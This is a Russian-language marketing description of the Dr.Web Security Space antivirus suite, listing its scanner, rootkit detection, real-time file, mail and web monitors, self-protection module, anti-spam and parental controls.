Возможность работы на уже инфицированном компьютере и исключительная вирусоустойчивость выделяют Dr.Web среди всех других аналогичных программ. Интеллектуальная технология фильтрации спама в Dr.Web Security Space, основанная на нескольких тысячах правил, не зависит от языка, на котором написано сообщение. Технологии антиспама Dr.Web позволяют снизить риск попадания нужного письма в папку "Спам" до рекордного в отрасли минимума. Протокол HTTP, используемый для передачи HTML-страниц и их компонентов (скриптов, графики, апплетов и т.д.) браузерам, является одним из источников проникновения вирусов и вредоносных объектов на компьютеры. Модуль SpIDer Gate в режиме реального времени.

• Высокопроизводительный Сканер Dr.Web быстро проверяет оперативную память, загрузочные секторы, жесткие диски и сменные носители, находит и обезвреживает вирусы, троянские программы и другие виды вредоносных объектов.
  
• Входящий в состав сканера Dr.Web Shield позволяет обнаружить скрывающиеся в системе вирусы (руткиты) и stealth-вирусы.
  
• Файловый монитор SpIDer Guard обеспечивает защиту в режиме реального времени и моментальный перехват всех обращений к файлам на дисках, дискетах, CD-ROMs, Flash-картах и смарт-картах. Это чрезвычайно эффективное, незаметное для пользователя средство постоянного мониторинга здоровья компьютера обладает высокой устойчивостью к попыткам вредоносных программ препятствовать функционированию SpIDer Guard или остановить его работу.
  
• Модуль самозащиты Dr.Web SelfPROtect ограничивает доступ вредоносных объектов к сети, файлам и папкам, некоторым веткам реестра и сменным носителям на уровне системного драйвера, защищает от попыток анти-антивирусных программ прекратить функционирование Dr.Web.
  
• Почтовый антивирусный монитор SpIDer Mail на лету сканирует каждое сообщение и доставляет в Вашу почтовую программу только чистые письма. Встроенный в него модуль антиспама отсеивает всю нежелательную корреспонденцию и защищает от атак кибер-мошенников.
  
• Веб-антивирус SpIDer Gate в режиме реального времени фильтрует HTTP-трафик на вирусы, блокирует фишинговые и другие опасные интернет-сайты.
  
• Родительский контроль Dr.Web защищает Ваших детей от посещения нежелательных, с вашей точки зрения, страниц, ограждает от контактов с людьми старшего возраста, мошенниками, извращенцами и другими опасными личностями